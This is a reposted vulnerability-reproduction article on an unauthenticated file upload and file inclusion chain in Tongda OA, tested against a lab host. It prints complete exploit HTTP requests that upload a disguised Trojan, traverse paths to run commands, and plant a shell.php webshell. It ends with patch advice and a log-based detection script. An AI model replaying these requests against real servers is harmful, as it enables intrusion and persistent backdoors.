
An example Analysis of getshell caused by arbitrary File upload vulnerabilities and File inclusion vulnerabilities in the Front desk of Tongda OA

2025-02-24 Update From: SLTechnology News&Howtos shulou


Shulou(Shulou.com)05/31 Report--

Today I will walk you through an example analysis of the getshell chain formed by the unauthenticated arbitrary file upload and file inclusion vulnerabilities in Tongda OA. Many people may not know much about it, so to help you understand it better the editor has summarized the following content. I hope you take something away from this article.

I. Vulnerability introduction

Tongda OA introduction:

Tongda OA (Office Anywhere Network Intelligent Office System) is collaborative office automation software developed independently by Beijing Tongda Xinke Technology Co., Ltd. Beijing Tongda Xinke Technology Co., Ltd. is a high-tech team whose main business is the R&D, implementation, service and consulting of collaborative management software. It is the only central state-owned enterprise in the domestic collaborative management software industry and the leading collaborative management software vendor in China.

OA provides information management capabilities to many users of different sizes across industries, covering process approval, administrative office work, daily affairs, statistical data analysis, instant messaging, mobile office and more, helping users reduce communication and management costs and improve production and decision-making efficiency. The system adopts the leading B/S (browser/server) operating mode, so networked office work is not limited by location. Tongda Office Anywhere uses WEB-based enterprise computing; its main HTTP server is Apache, the world's most advanced server, with stable and reliable performance. Data access is centrally controlled to avoid the possibility of data leakage. Data backup tools are provided to protect the data security of the system. Multi-level access control and complete password and login authentication mechanisms strengthen the security of the system.

The versions affected by the vulnerabilities are:

V11, 2017, 2016, 2015, 2013 Enhanced, 2013.

Note:

The vulnerabilities can be exploited from the front end without logging in.

Version 2013:

File upload vulnerability path: /ispirit/im/upload.php

File inclusion vulnerability path: /ispirit/interface/gateway.php

Version 2017:

File upload vulnerability path: /ispirit/im/upload.php

File inclusion vulnerability path: /mac/gateway.php

Vulnerability environment:

Target machine (Windows Server 2008 R2) IP: 172.16.0.45

Tongda OA version: V11.3

II. Environment setup

(1) After downloading OA V11.3, run the TDOA11.3 installer.

(2) Make sure port 80 is not in use, deploy the application on port 80, then click Next.

(3) Configuration complete.

(4) Check the deployment result.

(5) The account is admin and the password is empty. Log in to the backend system.

III. Vulnerability reproduction

3.1 Arbitrary command execution

(1) Front-end arbitrary file upload vulnerability: without logging in, capture any request, modify it and replay it to upload a Trojan (webshell) file with the .jpg suffix.

POST /ispirit/im/upload.php HTTP/1.1
Host: 172.16.0.45
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en
Cookie: PHPSESSID=123
Connection: close
Content-Length: 660

------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

[attachment body not reproduced on the original page]
------WebKitFormBoundarypyfBh2YB4pV8McGB--

(2) View the result.

(3) Front-end file inclusion vulnerability: modify the request to include the previously uploaded .jpg Trojan file and execute arbitrary commands.

The command executed here is "net user".

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 172.16.0.45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=net user

(4) Front-end file inclusion vulnerability: modify the request to include the previously uploaded .jpg Trojan file and execute arbitrary commands.

The command executed here is "ipconfig".

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 172.16.0.45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

json={"url":"/general/../../attach/im/2012/820434636.jpg"}&cmd=ipconfig

3.2 getshell

(1) Front-end arbitrary file upload vulnerability: capture any request, modify it and replay it to upload a Trojan file with the .jpg suffix (this Trojan file performs a file write).

POST /ispirit/im/upload.php HTTP/1.1
Host: 172.16.0.45
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh2YB4pV8McGB
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en
Cookie: PHPSESSID=123
Connection: close
Content-Length: 1393

------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="UPLOAD_MODE"

2
------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="P"

123
------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="DEST_UID"

1
------WebKitFormBoundarypyfBh2YB4pV8McGB
Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"
Content-Type: image/jpeg

[attachment body not reproduced on the original page]
------WebKitFormBoundarypyfBh2YB4pV8McGB--

(2) View the result.

(3) View the files in the /webroot/ispirit/interface/ directory.

(4) Front-end file inclusion vulnerability: modify the request to include the previously uploaded .jpg Trojan file, which writes a shell.php file into the directory of the including script.

POST /ispirit/interface/gateway.php HTTP/1.1
Host: 172.16.0.45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

json={"url":"/general/../../attach/im/2012/213131861.jpg"}&cmd=ipconfig

(5) View the execution result of the file inclusion.

(6) Connect with Behinder (Ice Scorpion): http://172.16.0.45/ispirit/interface/shell.php

Password: pass

PS: AntSword and China Chopper cannot connect here.

IV. Hardening suggestions

Users of the affected Tongda OA versions are advised to log in to the official Tongda OA website and obtain the latest patch. Select the program file that matches your current OA version, and make a backup before running it.
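As an added defender-side example (not part of the original article), the following Python correlates the two request steps of section III in a web-server access log: a POST to the upload endpoint followed, from the same client, by a POST to one of the gateway.php inclusion endpoints, plus any .php requested under /ispirit/interface/ that is not on an allowlist. The Apache combined log format, the 10-minute window and the allowlist are assumptions; the sample log lines and client addresses are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Endpoints named in the article: the unauthenticated upload endpoint and the
# file-inclusion entry points of the 2013 and 2017 code branches.
UPLOAD_PATH = "/ispirit/im/upload.php"
INCLUDE_PATHS = {"/ispirit/interface/gateway.php", "/mac/gateway.php"}
WINDOW = timedelta(minutes=10)  # assumed correlation window between the two POSTs
# Apache combined log format (assumed); only the fields needed here are captured.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse(line):
    m = LOG_RE.match(line)
    if not m:
        return None  # not an access-log line we understand
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "time": datetime.strptime(ts, TIME_FMT), "method": method,
            "path": path.split("?", 1)[0], "status": int(status)}

def find_upload_include_chains(lines):
    """(ip, upload_time, include_time, include_path) per client that POSTed to upload.php and then to a gateway.php within WINDOW."""
    uploads, hits = defaultdict(list), []
    for rec in filter(None, map(parse, lines)):
        if rec["method"] != "POST":
            continue
        if rec["path"] == UPLOAD_PATH:
            uploads[rec["ip"]].append(rec["time"])
        elif rec["path"] in INCLUDE_PATHS:
            for up in uploads[rec["ip"]]:
                if timedelta(0) <= rec["time"] - up <= WINDOW:
                    hits.append((rec["ip"], up, rec["time"], rec["path"]))
                    break
    return hits

def find_unexpected_scripts(lines, known=frozenset({"/ispirit/interface/gateway.php"})):
    """.php paths requested under /ispirit/interface/ that are not on the allowlist
    (allowlist assumed; only gateway.php is named in the article)."""
    return sorted({r["path"] for r in filter(None, map(parse, lines))
                   if r["path"].startswith("/ispirit/interface/")
                   and r["path"].endswith(".php") and r["path"] not in known})

# Constructed sample log lines; client addresses are made up.
SAMPLE_LOG = [
    '172.16.0.99 - - [31/May/2020:10:00:05 +0800] "POST /ispirit/im/upload.php HTTP/1.1" 200 87',
    '172.16.0.99 - - [31/May/2020:10:00:09 +0800] "POST /ispirit/interface/gateway.php HTTP/1.1" 200 1024',
    '172.16.0.50 - - [31/May/2020:10:01:00 +0800] "POST /ispirit/interface/gateway.php HTTP/1.1" 200 64',
    '172.16.0.99 - - [31/May/2020:10:02:00 +0800] "POST /ispirit/interface/shell.php HTTP/1.1" 200 64',
]
```

Running `find_upload_include_chains(SAMPLE_LOG)` flags only 172.16.0.99, whose upload and gateway.php POSTs are four seconds apart, and `find_unexpected_scripts(SAMPLE_LOG)` returns the shell.php path. A standard access log does not record the POST body, so the `../` traversal in the json url parameter is not visible here; inspecting it needs a WAF or application-level log.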

After reading the above, do you have a better understanding of this example analysis of getshell caused by the unauthenticated arbitrary file upload and file inclusion vulnerabilities in Tongda OA? If you want to learn more, please follow the industry information channel. Thank you for your support.
